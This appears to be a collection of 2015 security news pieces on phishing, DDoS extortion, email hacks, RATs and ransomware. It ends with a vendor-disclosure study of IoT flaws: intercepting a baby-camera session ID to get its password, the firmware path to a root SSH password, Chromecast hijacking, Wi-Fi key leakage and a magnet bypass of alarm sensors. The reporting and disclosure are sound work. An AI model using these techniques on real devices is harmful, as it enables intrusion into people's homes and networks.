Podniky v EU zaznamenaly škody kolem 62 miliard dolarů, v Asii a Tichomoří 81 miliard a v Severní Americe 61 miliard USD. Průměrný kybernetický útok stojí podnik 1,2 procenta příjmů. Nejvíce ohrožený se cítí finanční sektor.

„Kybernetické útoky jsou stále významnějším nebezpečím pro podnikání. Nejedná se jen o náklady ve finančním smyslu, ale také o vážné poškození pověsti společnosti, jako se to stalo v případě webového portálu Ashley Madison, ze kterých se hackerům podařilo odcizit 36 miliónů e-mailů," uvedl partner Grant Thornton Advisory David Pirner.

V Česku hrozí spíše útok na databáze osobních dat než kyberútok na strategickou infrastrukturu. Bankovní sektor je podle Pirnera připraven relativně dobře. Ví totiž, na co se připravit, a navíc jsou banky pod palbou hackerů každý den. České banky byly zřejmě zčásti oběťmi loňského útoku mezinárodní skupiny Carbanak, která sérií napadení získala celosvětově přes 20 miliard korun.

Podle odborníků není v Česku pravděpodobný podobný masivní kybernetický útok, jenž nedávno postihl britského operátora TalkTalk, který mohl vést ke krádeži osobních údajů všech více než čtyř miliónů zákazníků, případně by spíše mířil na některého z virtuálních hráčů. „Velcí mobilní operátoři nevyužívají odlišné zabezpečovací systémy než jiné velké firmy a na bezpečnosti spíše nešetří. U nízkonákladových operátorů může být ale situace jiná," uvedl specialista na počítačovou bezpečnost společnosti DCIT Karel Miko.

Financial Reporting Council of Nigeria site used for phishing scam

According to Netcraft, the website of Financial Reporting Council of Nigeria is used to serve a webmail phishing site from the legitim site of the agency.
The website of the Financial Reporting Council of Nigeria was used by cyber criminals in a phishing scam. According to the experts at Netcraft, the website of Financial Reporting Council of Nigeria is used to serve a webmail phishing site from the legitim site of the agency.

The attack is not complex, crooks used a common phishing kit that allows easily to create customised phishing pages.

“The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.” states the report.
Financial Reporting Council of Nigeria phishing page

The hackers likely have compromised the government website and they have deployed the phishing web page into an images directory on the Financial Reporting Council of Nigeria website. The experts noticed also that the website of the Financial Reporting Council of Nigeria runs an older version 2.5.28 of the Joomla CMS which is no more supported.

The phishing page asks for user email credentials and the phone number used as backup login credentials for the Gmail service. When the victim has inserted the information they are transmitted via email directly to the cyber criminals. Then the phishing page redirects the victim’s browser to the Saatchi Art investment website at http://explore.saatchiart.com/invest-in-art/, but experts clarified that it is not involved in the scam.

“After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim’s IP address, and a third-party web service is used to deduce which country the victim is in.” continues the post published by Netcraft.

Financial Reporting Council of Nigeria phishing page 2

The experts at Netcraft explained that this phishing scam is unusual because attackers seem to be more interested in collect users’ credentials shared among several web services, instead the victims’ banking account logins.

Netcraft reported that the majority of Nigeria’s government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. They speculate the attacker exploited a flaw in the Joomla! CMS to deploy the phishing kit.

ProtonMail Paid Hackers $6000 Ransom in Bitcoin to Stop DDoS Attacks

The Geneva-based encrypted email service ProtonMail was forced to pay a Ransom of almost $6,000 to stop sustained Denial-of-service (DDoS) attacks that have knocked its service offline since Tuesday.
ProtonMail – a full, end-to-end encrypted email service that launched last year – has been dealing with, what it called, the extremely powerful DDoS attack, and is still unavailable at the time of writing.
ProtonMail Paid $6,000 to Stop DDoS
In an official statement posted on a WordPress blog Thursday, officials of ProtonMail said the powerful DDoS attack by an unknown group of hackers forced them to pay 15 Bitcoins (about $5,850) in exchange for them halting the assault.
However, even after paying the ransom amount, the crippling DDoS attacks continued to the ProtonMail service.
DDoS Attack Continues Even After Paying Ransom
ProtonMail officials said, "We hoped that by paying [ransom], we could spare other companies impacted by the [DDoS] attack against us, but the attack continued nevertheless."
"Attacks against [key] infrastructure continued throughout the evening and to keep other customers online, our ISP [Internet Service Provider] was forced to stop announcing our IP range, effectively taking us offline."
Scary, Large-Scale DDoS attack
However, the criminals who extorted ProtonMail previously did not take responsibility for the second DDoS attack, which according to the company, was more "scary" and "a full-scale infrastructure attack."
"This coordinated assault on [our] key infrastructure eventually managed to bring down both the ISP and the datacenter, which impacted hundreds of other companies, not just ProtonMail," the company wrote.
Although the motive behind the attack is still unclear, ProtonMail promises that it is working hard to restore the service to its users.
Customers' Data Unaffected
The company is working with both the security officials in its Switzerland-based data center and others across the world to get the situation under control.
In its official Twitter account, ProtonMail reassured its customers that their data is "secure and untouched," but access to its site is unlikely, before confirming on Thursday that the service was under second DDoS attack.
ProtonMail offers an end-to-end encrypted webmail system designed by CERN scientists to fight snooping by law enforcement agencies like the NSA. Since its launch, the service has over 500,000 users worldwide.

FBI Deputy Director's Email Hacked by Teenager Who Hacked CIA Chief

The same group of teenage hackers that hacked the AOL email account of the CIA director John Brennan two weeks ago has now hacked into AOL email accounts of the FBI Deputy Director, Mark Giuliano and his wife.
Yesterday, Cracka, a member of the teenage hacktivist group known as 'Crackas With Attitude' (CWA) posted a new trove of information belong to thousands of government employees online; however they claim to have accessed far more than that.
The hackers claimed to have obtained the personal information by hacking into AOL email accounts of the Giuliano and his wife.
More Than 3,500 Government Employees Doxxed
The published information includes more than 3,500 names, email addresses and contact numbers of law enforcement and military personnel.
Though the FBI officials couldn't immediately verify the claims, Infowars has confirmed the authenticity of several people listed, which includes everyone from local police officers to FBI and military intelligence analysts.
Following the last CIA director's email hack, Mr. Giuliano made aggressive statements about catching the hackers and making an example out of CWA.
Also Read: WikiLeaks Publishes CIA Director's Hacked Emails
The CWA hacking group got angry over the statement made by Giuliano and moved forward to teach him a lesson by hacking his personal email account.
Cracka Twitter account was temporarily deleted, but before his account got deactivated by Twitter Thursday evening, Cracka claimed to have leaked the information in support of Palestine.
Hacker Made Phone Call to FBI Deputy Director
Motherboard spoke to the group of hackers that claimed they have access to a lot more than the information they shared Thursday.
Also Read: 4000 Malicious iOS Store Apps Linked to CIA
However, the FBI has declined to comment on whether or not Mark Giuliano was hacked, although Cracka said the group found deputy director's phone number in the email account’s contact lists.
The hacker also claimed to have called the number. "I called it and asked for Mark, and he is like 'I don't know you, but you better watch your back', and then he hung up, and I kept calling and he was getting mad then he didn't pick up," Cracka said.

ProtonMail paid a $6000 Ransom to stop DDoS Attacks

ProtonMail has paid a $6000 Ransom to stop prolonged DDoS attacks that knocked its services offline since Tuesday. Unfortunately, the attacks are continuing.
The popular encrypted email service ProtonMail has suffered a prolonged major DDoS attack that knocked it offline since Tuesday. It was an extortion attempt, the attackers requested a ransom in order to stop the DDoS attack on the services of the company.

The company decided to pay a Ransom of almost $6,000 to stop the sustained Denial-of-service (DDoS) attacks, at the time of writing the ProtonMail encrypted email service is still down.

The news related the decision of ProtonMail of paying the ransom was published in an official statement posted on a the protonmaildotcom.wordpress.com blog on Thursday.

“As many of you know, ProtonMail came under sustained DDOS attack starting on November 3rd, 2015. At the current moment, we are not under attack and have been able to restore services, but we may come under attack again.” states the post.

protonmail DDoS

The representatives of the ProtonMail explained that the company was victim of a powerful DDoS attack by an unknown group of hackers that requested 15 Bitcoins (about $5,850) in exchange for them stopping the DDoS attacks.

The hackers requested the payment of 15 Bitcoin on the address “1FxHcZzW3z9NRSUnQ9Pcp58ddYaSuN1T2y.” Below the history associated to this specific account used by crooks.

protonmail ransom bitcoin

The real problem is that even if the company has paid the ransom the DDoS attacks continued, the attackers’ motivation is still unclear.

“We hoped that by paying [ransom], we could spare other companies impacted by the [DDoS] attack against us, but the attack continued nevertheless.” “Attacks against [key] infrastructure continued throughout the evening and to keep other customers online, our ISP [Internet Service Provider] was forced to stop announcing our IP range, effectively taking us offline.”
“This coordinated assault on [our] key infrastructure eventually managed to bring down both the ISP and the datacenter, which impacted hundreds of other companies, not just ProtonMail,” the company wrote.
ProtonMail is working to restore the service and is supporting the investigation conducted by the Swiss Governmental Computer Emergency Response Team (GovCERT), the Cybercrime Coordination Unit Switzerland (CYCO), and the Europol.

Below the description of the attack provided by ProtonMail:

“Slightly before midnight on November 3rd, 2015, we received a blackmail email from a group of criminals who have been responsible for a string of DDOS attacks which have happened across Switzerland in the past few weeks. This threat was followed by a DDOS attack which took us offline for approximately 15 minutes. We did not receive the next attack until approximately 11AM the next morning. At this point, our datacenter and their upstream provider began to take steps to mitigate the attack. However, within the span of a few hours, the attacks began to take on an unprecedented level of sophistication.” states the post. “At around 2PM, the attackers began directly attacking the infrastructure of our upstream providers and the datacenter itself. The coordinated assault on our ISP exceeded 100Gbps and attacked not only the datacenter, but also routers in Zurich, Frankfurt, and other locations where our ISP has nodes. This coordinated assault on key infrastructure eventually managed to bring down both the datacenter and the ISP, which impacted hundreds of other companies, not just ProtonMail.”

The company has confirmed that customer data are not affected by the ongoing attacks, they are “secure and untouched.”

ProtonMail’s also explained that its systems are still vulnerable to attacks of this magnitude, but it is thinking for a definitive solution to mitigate these events. The problem is that such kind of solutions is very expensive, the company requested users to Donate to the ProtonMail Defense Fund.

“At present, ProtonMail’s infrastructure is still vulnerable to attacks of this magnitude, but we have a comprehensive long term solution which is already being implemented. Protecting against a highly sophisticated attack like the second one which was launched against us requires sophisticated solutions as we also need to protect our datacenter and upstream providers. Cost estimates for these solutions are around $100,000 per year since there are few service providers able to fight off an attack of this size and sophistication”

The practice to hit companies with sustained DDoS attacks is quite common, according to a report published by Akamai in September, the DD4BC criminal group has been responsible for at least 114 DDoS attacks on its customers.

Avast uvedl na trh edice 2016 svých bezpečnostních řešení

6.11.2015 Ochrana
Nová bezpečnostní řešení pro PC a mobilní zařízení oznámil Avast. Verze 2016 pro PC přináší kromě jiného i multiplatformní řešení nazvané Hesla Avast (Avast Passwords), které uživatelům pomůže lépe se zorientovat v problematice spojené s ochranou osobních informací.

Avast 2016 přináší také rychlejší instalaci, zjednodušené uživatelské rozhraní a plnou kompatibilitu s Windows 10.

Hesla Avast představuje o multiplatformní řešení, které umožňuje synchronizovat všechna hesla napříč všemi zařízeními, včetně zařízení Android a iOS, dále umožňuje zkontrolovat úroveň bezpečnosti nastavených hesel a smazat všechna hesla uložená v internetovém prohlížeči.

Funkce Hesla Avast také umí uživatele upozornit na ztrátu ověřovacích údajů v případě úniku dat.

Novinky Avast 2016 pro PC podle dodavatele:

Hesla Avast — Tento správce hesel automaticky generuje silná hesla, která si uživatelé nemusí pamatovat — uživatelé si nastaví a zapamatují pouze jedno hlavní heslo, které jim umožní přístup ke všem ostatním heslům. Je dostupné ve všech verzích Avast 2016 pro PC, Android a iOS, podle výrobce bude brzy k dispozici i pro Mac.

Prohlížeč SafeZone — Izoluje všechny webové stránky týkající se on-line nakupování, bankovních převodů a finančních operací do „chráněného prostoru“, ve kterém otevírá i veškeré podezřelé webové stránky. SafeZone funguje zároveň i jako rozšíření prohlížeče, který nejen že blokuje nechtěné reklamy (díky vestavěnému Ad Blockeru), ale také umožňuje rychlejší načítání webových stránek. Pomocí další funkce rozšíření prohlížeče nazvané Do-Not-Track se mohou uživatelé dozvědět, které firmy sledují jejich chování na internetu a mohou se tak rozhodnout, kterým z nich toto povolí a kterým ne. SafeZone je součástí prémiových verzí produktů Avast 2016.
Vylepšená funkce Zabezpečení domácí sítě — Tato funkce nově odhalí dalších 12 typů zranitelností domácího routeru. Jedním kliknutím tak umožní zkontrolovat celou domácí síť včetně tiskáren, síťových disků a routeru.

Anonymous Group Leaks Identities of 1000 KKK Members

The online hacktivist group Anonymous has followed through on its promise to disclose the identities of hundreds of Ku Klux Klan members.
On Monday, Anonymous vowed to release the full info dump of about 1,000 alleged Ku Klux Klan members with a chosen date of 5th of this November.
As promised, Anonymous posted a link to a Pastebin account with the names, aliases, Google Plus profiles, Facebook accounts and other identifying information of roughly 1,000 individuals the group believes are members of the Ku Klux Klan.
The hackers behind the leak tweeted a link to a Pastebin on a Twitter account, Operation KKK (@Operation_KKK) believed to be controlled by them.
Ku Klux Klan (KKK) is classified as a White Supremacist Racist group by the Anti-Defamation League and the Southern Poverty Law Center, allegedly having total 5,000 to 8,000 members.
"We hope Operation KKK will, in part, spark a bit of constructive dialogue about race, racism, racial terror and freedom of expression, across group lines. Public discourse about these topics can be honest, messy, snarky, offensive, humbling, infuriating, productive, and serious all at once," Anonymous wrote in the Pastebin post.
"The reality is that racism usually does NOT wear a hood, but it does permeate our culture on every level. Part of the reason we have taken the hoods off of these individuals is not because of their identities, but because of what their hoods symbolize to us in our broader society."
Anonymous also notes that the group collected the information of KKK members over 11 months through public documents, "digital espionage," interviews with experts and information from social media accounts of KKK affiliates.
However, the group has not published any personal information about the KKK members.

OmniRat RAT is currently being used by criminals in the wild

Researchers at Avast have published an analysis of OmniRAT, a multi-platform remote administration tool (RAT) that has been used by criminals in the wild.
Researchers at Avast have conducted a brief analysis of OmniRAT, a multi-platform remote administration tool (RAT) that has been used for malicious purposes.

The malware researchers at Avast have published an interesting analysis of the multi-platform remote administration tool OmniRAT. The OmniRAT remote administration tool works on Android, Windows, Linux and Mac OS X OSs.

It is very popular and cheap, the OmniRAT lifetime license for servers and clients are offered for sale for $25 and $50, and operators also offer lifetime support.

Despite OmniRAT is not designed for illicit purposes, the experts at Avast have observed it being used my many crooks as a remote access Trojan.

The attackers use to spread the RAT via social engineering, a German user explained that his Android was infected via SMS containing a shortened URL link pointing to a website where the victim was instructed to enter a code and their phone number. The SMS was claiming that the victim had received an MMS that cannot be sent him because its mobile phone was affected by the Android StageFright vulnerability

When victims provide the information requested the website serve an APK reporting the icon labeled “MMS Retrieve” when installed. Then it is sufficient to click on the icon to start the installation of the OmniRAT.

OmniRAT 2

“A custom version of OmniRat is currently being spread via social engineering. A user on a German tech forum, Techboard-online, describes how a RAT was spread to his Android device via SMS. After researching the incident, I have come to the conclusion that a variant of OmniRat is being used.” is reported in the blog post published by Avast.

The malware analyst Nikolaos Chrysaidos from Avast explained that once criminals have infected the mobile device could access its contact list in order to spread OmniRat.

“The victim then has no idea their device is being controlled by someone else and that every move they make on the device is being recorded and sent back to a foreign server,” Chrysaidos said. “Furthermore, once cybercriminals have control over a device’s contact list, they can easily spread the malware to more people. Inside this variant of OmniRat, there is a function to send multiple SMS messages. What makes this especially dangerous is that the SMS spread via OmniRat from the infected device will appear to be from a known and trusted contact of the recipients, making them more likely to follow the link and infect their own device.”

OmniRat is quite to another RAT, DroidJack, that was used by several organizations in the criminal underground for illegal activities. OmniRat is cheaper that DroidJack which is offered for sale a nearly $210.

Mabouia: The first ransomware in the world targeting MAC OS X


Rafael Salema Marques, a Brazilian researcher, published a PoC about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X.
Imagine this scenario: You received a ransom warning on your computer stating that all your personal files had been locked. In order to unlock the files, you would have to pay $500.

This is the “modus operandi” imposed usually used by ransomware (ransom +software).

Ransomware encrypts files that are virtually impossible to decrypt with the computing means available to ordinary users. The only way to decrypt the files is paying to the malware creator to retrieve the password that unlocks the files… Which is exactly what you would do if I had not held up important files.

The definition of ransomware according to Wikipedia is as follows: “type of malware that restricts access to a computer system that it infects in some ways, and demands that the user pay a ransom to the operators of the malware to remove the restriction.” There are several actives ransomware in the world today, but no one had ever been designed to target Mac OS X until yesterday.

Mabouia ransomware

Rafael Salema Marques (@pegabizu), a Brazilian Cybersecurity Researcher, published yesterday a proof of concept about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X.

The researcher’s goal is to alert the 66 million users of Mac OS X about the myth that there is no malware aimed at Apple’s personal computers.

The creator of the malicious code also mentions that Mac users are a good target for ransomware, because generally have a higher purchasing power and use the computer in a superficial way, usually by editing images and texts.

The malware name Mabouia refers to a kind of endemic lizard found on the island of Fernando de Noronha – Brazil. Is coded in C++ and uses the cryptographic algorithm XTEA with 32 rounds to encrypt the user files. Furthermore, it does not need superuser privileges for the execution of malicious code, considering that the ransomware will only modify the user’s personal files. Thus infection occurs with just one click.

In the link below you can see Mabouia ransomware in action:

Surviving in an IoT-enabled world

Scare stories around the Internet of Things (IoT) conjure up images of bad guys in hoodies, who live for hacking and to make the lives of other people harder, inventing millions of ways to infiltrate your life through your gadgets. But is this perception a good enough reason to stop using smart devices? We don’t think so; we believe that customers should be aware of the potential risks and know how to mitigate them before embracing the IoT-enabled world.

More than a year ago, our colleague from the Global Research and Analysis Team, David Jacoby looked around his living-room, and decided to investigate how susceptible the devices he owned were to a cyber-attack. He discovered that almost all of them were vulnerable. So, we asked ourselves: was that a coincidence, or are the smart ‘IoT’ products currently on the market really that exposed? To find the answer, earlier this year we gathered up a random selection of connected home devices and took a look at how they work.

The devices we chose for our experiment were as follows:

a USB-dongle for video streaming (Google Chromecast);
a smartphone-controlled IP camera;
a smartphone-controlled coffee maker; and
a home security system, also smartphone-controlled.
The task we set ourselves was simple: to find out whether any of those products posed a security threat to their owner. The results of our investigation provide much food for thought.

Google Chromecast. IoT hacking for beginners

Risk: the content on the victim’s screen is streamed from a source owned by an attacker

Chromecast, which has been recently updated with a more advanced version, is an interesting device. It’s an inexpensive USB-dongle that allows you to stream media from your smartphone or tablet to a TV- or other display-screen. It works like this: the user connects it to a television’s HDMI in order to switch it on. After that the Chromecast launches its own Wi-Fi-network for initial setup. Once it has established a connection with a smartphone or a tablet, it switches its own Wi-Fi off and connects to the user’s home Wi-Fi network. It’s very convenient and user-friendly.

Surviving in an IoT-enabled world

But this could become less convenient and decidedly unfriendly if there is a hacker nearby. The famous “rickrolling” vulnerability, discovered by security consultant, Dan Petro, proves that. It allows the content on the victim’s screen to stream from a source owned by an attacker. This is how it works: the attacker floods the device with special ‘disconnect’ requests from a rogue Raspberry Pi-based device and then, as the Chromecast turns on its own Wi-Fi module in response, Google Chromecast is reconnected to the attacker’s device making it stream the content the attacker wants.

The only way to get rid of this is to switch off the TV, take the dongle out of range of your Wi-Fi hotspot and wait until the attacker gets bored and goes away.

The only limitation to this attack is that the attacker needs to be within range of the Wi-Fi network to which the target Chromecast is connected. However, we discovered in our own experiment that this not necessarily a restriction if you have a cheap directional Wi-Fi antenna and some Kali Linux software. When we used that, we found that Chromecast can be “rickrolled” across a far greater distance than the normal signal range for domestic Wi-Fi networks. What this means is that, while in the original hack by Dan Petro, the attacker would run the risk of being spotted by an angry Chromecast owner, with a directional antenna that risk no longer exists.

We don’t regard this “finding” as a new security discovery; it simply extends a previously-known and so far unpatched security issue. It’s an exercise for beginners in IoT hacking, although it could be used in a really harmful way – but we’ll get to that later. First we’ll go through the other findings of our brief research.

Mitigation: Use in remote parts of your house as this will lower the risk of attacks with a directional antenna

Status: Not patched

IP camera

Issue one

Risk: attackers get access to the email addresses of all the camera users who have experienced technical issues

The IP camera we investigated was positioned by its vendor as a baby monitor. You put the camera in a nursery, download an app on your smartphone, connect the camera to the app and the Wi-Fi, and off you go: you can watch your child whenever you want, from anywhere you like.

Surviving in an IoT-enabled world

Why would someone want to hack a baby monitor, you may well ask? Actually there are a number of recorded instances of baby monitor abuse dating back as early as 2013 (http://www.cbsnews.com/news/baby-monitor-hacked-spies-on-texas-child/) with a similar issue reported in 2015 (http://www.kwch.com/news/local-news/whitewater-woman-says-her-baby-monitor-was-hacked/32427912). So yes, there are people who, for some reason want to hack baby monitors.

When we investigated our camera (in the spring of 2015) there were two different apps available for customers that enabled them to communicate with the camera. Both contained security issues. We were later to learn from the vendor that one of these apps was a legacy app, however it was still being used by a number of camera owners. We discovered that this legacy app contained hardcoded credentials to a Gmail account.

public static final String EMAIL_FROM = “*****@gmail.com”;
public static final String EMAIL_PASSWORD = “*******”;
public static final String EMAIL_PORT = “465”;
public static final String EMAIL_SMTP_HOST = “smtp.gmail.com”;
public static final String EMAIL_TO;
public static final String EMAIL_TO_MAXIM = “maximidc@gmail.com”;
public static final String EMAIL_TO_PHILIPS = “*****@philips.com”;
public static final String EMAIL_USERNAME = “*****@gmail.com”;

The vendor later told us that the account was used to collect reports on technical issues from the camera users.

The problem here is that reports were being sent to this pre-installed account from users’ own email accounts. So an attacker would not even need to buy a camera; all they needed to do was download and reverse-engineer one of the apps to get access to the technical email account and to collect the email addresses of all the camera users who had experienced technical issues. Is it a big issue, that your email could have been exposed to a third party as a result of the exploitation of that vulnerability? It might be. However, realistically-speaking this vulnerability doesn’t appear to be a tempting target for mass-harvesting personal information, mainly because of its relatively small base of victims. Technical issues are rare and the app was old and not really popular at the time of our research. Baby monitors are also a niche product so not many email addresses are stored.

On the other hand, if you are the owner of a baby monitor, you’re most likely a parent and that fact makes you (and by extension your email address) a much more interesting target should an attacker plan a specific, tailored, fraud campaign.

In other words, this is not a critical security vulnerability but it could still be used by attackers. But that wasn’t the only vulnerability we found while investigating the camera and the app.

Status: fixed

Issue two

Risk: full control of the camera by an attacker

After looking at the legacy app we moved on to the more recent version and immediately discovered another interesting issue.

The application communicates with the camera through a cloud service and communication between the app and the cloud service is https-encrypted. The application uses Session ID for authentication which is changed automatically each time a user initiates a new session. It might sound secure, but it is in fact possible to intercept the Session ID and to control the camera through the cloud or to retrieve the password for local access to the camera.

Before the app starts streaming data from the camera, it sends an http request to the cloud service:


This request contains the Session ID which could be intercepted as the request is unencrypted. The Session ID is then used to retrieve the current password. We found that it could be done by creating a special link with the Session ID in the end.


In return for this link the cloud service would send the password for the session.

https:// *****/*****/*****sessionId=100-U3a9cd38a-45ab-4aca-98fe-29b27b2ce280

… “local_view”:{“password”:”N2VmYmVlOGY4NGVj”,”port”:9090} …

Using the password it is possible to get full control of the camera, including the ability to watch the streamed video, listen to audio, and play audio on the camera.

It is important to note that this is not a remote attack – the attacker must be on the same network as the app user in order to intercept the initial request, making exploitation less likely. However, app users should still proceed with caution, especially if they are using large networks that can be accessed by many people. For example, if the app user is connecting to their camera from public Wi-Fi, they could be exposing themselves to risk from an attacker on the same network. In such conditions it would not be hard to imagine a real-life app-usage scenario that involved a third-party.

Status: fixed

Issue three

Risk: god mode – an attacker can do anything with camera firmware

The third issue we discovered while investigating our smartphone-controlled camera resided not in the app but in the camera itself. And the issue is rather simple: a factory root password for SSH in the firmware. It is simple because the camera is running on Linux and the root password enables god-mode for anyone who has access to the device and knows the password. You can do anything with camera firmware: modify it, wipe it – anything. All the attacker needs to do in order to extract the password is to download and extract the firmware from the vendor’s website (although the attacker would need to be in the same network with the attacked device to get the URL from which the firmware is being downloaded), extract it and follow this path: \\ubifs\\home/.config. There it is: in plain text.



What’s more worrying is that, unless they are a Linux expert, there is no way for an inexperienced user to remove or change this password by themself.

Why the SSH password was there is a mystery to us, but we have some suggestions. The root access would be of use to developers and technical support specialists in a situation where a customer encounters an unexpected technical problem that could not be fixed over the phone. In this case, a specialist could connect to the camera remotely, use the SSH password to get root access and fix an issue. Apparently this is a common practice for new models of such devices, which can contain bugs that were not discovered and fixed at the pre-release stage. We looked at the firmware of some other cameras from an alternative vendor and also discovered SSH passwords in there. So the story is: developers leave the SSH password in the firmware in order to have the ability to fix unexpected bugs there and then, and when a stable version of firmware is released they just forget to remove or encrypt the password.

Our second suggestion is that they just forgot it was there. As we discovered during our research, the part of the device where SSH passwords were found – the chipset – is usually shipped by a third-party vendor. And the third-party vendor leaves the SSH password in the camera by default for convenience, to make sure that the vendor of the end-product (the baby monitor) has the ability to tune up the chipset and to connect it with other hardware and software. So the vendor does this and then just forgets to remove the password. As simple as it sounds.

Status: fixed

Communications with the vendor

It wasn’t hard to discover these vulnerabilities and we have to admit that it wasn’t difficult to report them to the vendor and help them to patch them. The camera we investigated was branded by Philips, but was actually produced and maintained by Gibson Innovations. The representatives of the company were extremely quick to react to our report. As a result all the issues we reported have been patched, both in the camera and in the apps (Android and iOS).

This autumn, Rapid7 released a very interesting report about vulnerabilities in baby monitors, and a Philips product (a slightly different version of the camera we investigated) was on the list of vulnerable devices, with a number of vulnerabilities noted, some of them similar to those discovered in our research. But judging by the ‘from-discovery-to-patch’ timeline presented in the report, Gibson Innovations is one of only a few IoT vendors to treat security issues in their products seriously and to do so continuously. Kudos to them for such a responsible approach.

But back to our research.

One could say that the security issues we’ve discovered in the IP camera require access to the same network as the user of the camera or the camera itself, and they would be right. On the other hand, for an intruder that is not necessarily a major obstacle, especially if the user has another connected device in their network.

A smartphone-controlled coffee machine

What could possibly go wrong?

Risk: leakage of the password to the home wireless network

The coffee machine we’ve randomly chosen can remotely prepare a cup of coffee at the exact time you want. You just set the time and when the coffee is ready the app will send you a push-notification. You can also monitor the status of the machine through an app. For instance, it is possible to find out if it is brewing now or not, if it is ready for brewing or if it is time to refill the water container. In other words, a very nice device, which, unfortunately, gives an attacker a way to hijack the password of your local Wi-Fi network.

Surviving in an IoT-enabled world

Before you use it you have to set it up. It happens like this: when the device is plugged in, it creates a non-encrypted hotspot and listens to UPNP traffic. A smartphone running the application for communicating with the coffee machine connects to this hotspot and sends a broadcast UDP request asking if there are UPNP devices in the network. As our coffee machine is such a device, it responds to this request. After that a short communication containing the SSID and the password to the home wireless network, among other things, is sent from the smartphone to the device.

Surviving in an IoT-enabled world

This is where we detected a problem. Although the password is sent in encrypted form, the components of the encryption key are sent through an open, non-protected channel. These components are the coffee machine’s Ethernet address and some other unique credentials. Using these components, the encryption key is generated in the smartphone. The password to the home network is encrypted with this key using 128-bit AES, and sent in base64 form to the coffee machine. In the coffee machine, the key is also generated using these components, and the password can be decrypted. Then, the coffee machine connects to the home wireless network and ceases to be a hotspot until it is reset. From this moment on, the coffee machine is only accessible via the home wireless network. But it doesn’t matter, as by then the password is already compromised.

Status: the vulnerability is still in place

Communications with vendor

We’ve reported our findings to the vendor of the coffee machine, and the vendor has acknowledged the issue and provided us with the following statement:

“Both user experience and security are extremely important to us and we continually strive to strike the right balance between the two. The actual risks associated with the vulnerabilities you mentioned during set-up are extremely low. In order to gain access, a hacker would have to be physically within the radius of the home network at the exact time of set-up, which is a window of only a few minutes. In other words, a hacker would have to specifically target a smart coffee maker user and be around at the exact point of set-up, which is extremely unlikely. Because of this, we do not believe the potential vulnerabilities justify the significant negative impacts it will have on user experience if we make the suggested changes. Though no definite plans to change our set-up procedure are in the works, we are constantly reevaluating and wouldn’t hesitate to make changes if risks become more significant. Should something change in the near future we will let you know.”

We don’t entirely disagree with this statement and have to admit that the attack window is extremely short. The vulnerability could be patched in several ways, but based on the conclusions of our own analysis, almost all of these ways would involve either hardware changes (the Ethernet port on the coffee machine or a keyboard for the password would solve the problem) or the provision of a unique pin code for each coffee machine including those that have already been sold, which is not easy from a logistical point of view. Such changes would considerably impact the user experience and the set up process would become less straightforward.

The only software fix we can propose is to implement asymmetric encryption. In this case the coffee maker would have to send out the public encryption key to the user’s smartphone and only after that the sensitive data exchange would start. This, however, would still allow any user in a given Wi-Fi network, including the attacker, to take control of the coffee machine. The public key would be available to everyone, and the first user to receive it and establish the connection with the coffee maker will be able to control it. Nevertheless, the legitimate user of the coffee machine will at least have a clue that something is going wrong, as during/following? a successful attack they wouldn’t be able to communicate with the device. This is not the case with the current software running on the coffee machine.

So we can say that to some degree we understand the vendor logic: the level of risk this issue brings doesn’t match the level of complexity of measures that must be implemented in order to eliminate the issue. Besides that, it would be wrong to say that the vendor didn’t think about the security of their product at all: as we said earlier, the password is transmitted in protected form, and you have to hold the antenna in a special way.

However, the vulnerability still exists and for a smart criminal it wouldn’t be a problem to exploit it to obtain your Wi-Fi password. The situation is interesting: if you are a user of this coffee maker, every time you change the password for your home Wi-Fi network in order to make it more secure, you’re actually exposing this new password, because each time you implement a new password you have to set up the coffee machine again. And you would never know whether someone had sniffed your password or not. For some people this may not be an issue, but for others it is most certainly a security problem.

For this reason, we will not disclose the vendor or model so as not to draw unwanted attention to the vulnerable product. However, if you are a user of a smartphone-controlled coffee maker and you’re worried about this issue, do not hesitate to contact the vendor and ask them if our findings have something to do with the product that you own, or are planning to purchase.

Onto the final chapter of our journey into the insecure world of IoT.

Home security system vs physics

Risk: bypassing security sensors with no alarms

App-controlled home security systems are pretty popular nowadays. The market is full of different products intended to secure your home from physical intrusion. Usually such systems include a hub that is connected to your home network and to your smartphone, and a number of battery-powered sensors that communicate wirelessly with the hub. The sensors are usually door/window contact sensors that would inform the owner if the window or door they guard has been opened; motion sensors; cameras.

When we initially got our hands on a smart home security system we were excited. Previously we’d seen a lot of news about researchers finding severe vulnerabilities in such products, like the research from HP or another awesome piece of research on the insecurity of the ZigBee protocol used by such products, presented at this year’s Black Hat. We prepared ourselves for an easy job finding multiple security issues.

Surviving in an IoT-enabled world

But that wasn’t the case. The more we looked into the system the better we understood that, from a cyber-security perspective, it is a well-designed device. In order to set up the system, you have to connect the hub directly to your Wi-Fi router, and in order to make the app communicate with the hub, you have to create an account on the vendor’s website, provide your phone number and enter the secret pin code that is sent to you via SMS. All communications between the app and the system are routed through the vendor’s cloud service and everything is done over https.

When looking at how the hub downloads new versions of firmware, we found that the firmware is not signed, which is a bit of an issue as it potentially allows you to download any firmware onto the device. But at the same time, in order to do so you’d have to know the password and the login of the user account. Also, when on the same network as the security system it is possible to send commands to the hub, but to understand what kind of commands it is possible to send, you’d need to reverse-engineer the hub firmware which is not really security research, but aggressive hacking. We’re not aggressive hackers.

So from a software point of view – if you’re not intending to hack a device at all costs – the home security system we investigated was secure.

But then we looked at the sensors.

Defeating contact sensors with their own weapon

Intrusion or contact sensors, included in the package, consist of three main parts: the magnet (the part that you put on a door or on the moving part of a window), the radio transmitter, and the magnetic field sensor. It works as follows: the magnet emits a magnetic field and the magnetic field sensor registers it. If the door or window is opened, the sensor will stop registering the magnetic field and will send a notification to the hub, indicating that the door/window is open. But if the magnetic field is there, it will send no alarms, which means that all you need to bypass the sensor is a magnet powerful enough to replace the magnetic field. In our lab we put a magnet close to the sensor, and then we opened the window, got in, closed the window and removed the magnet. No alarms and no surprises.

One could say that it would only work with windows, where you can be lucky enough to locate easily the exact place where the sensor is placed. But magnetic fields are treacherous and they can walk through walls, and the simplest magnetic field detection app for the smartphone will locate a sensor precisely, even if you don’t have visual contact. So doors (if they’re not made of metal) are vulnerable too. Physics wins!

